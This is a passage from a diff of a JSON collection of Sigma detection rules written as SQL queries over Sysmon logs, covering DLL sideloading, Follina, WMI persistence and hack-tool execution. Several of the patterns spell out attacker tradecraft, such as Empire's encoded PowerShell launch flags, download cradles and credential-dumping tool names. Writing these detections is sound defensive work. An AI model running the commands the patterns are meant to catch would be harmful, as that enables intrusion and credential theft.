'%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program 
Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Network administrator computer" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + 
"filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "status": "experimental", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload 
arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "status": "experimental", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in 
its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": 
"Detects WMI command line event consumers", + "author": "Thomas Patzke", + "tags": [ + "attack.t1546.003", + "attack.persistence" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) 
loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "status": "experimental", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
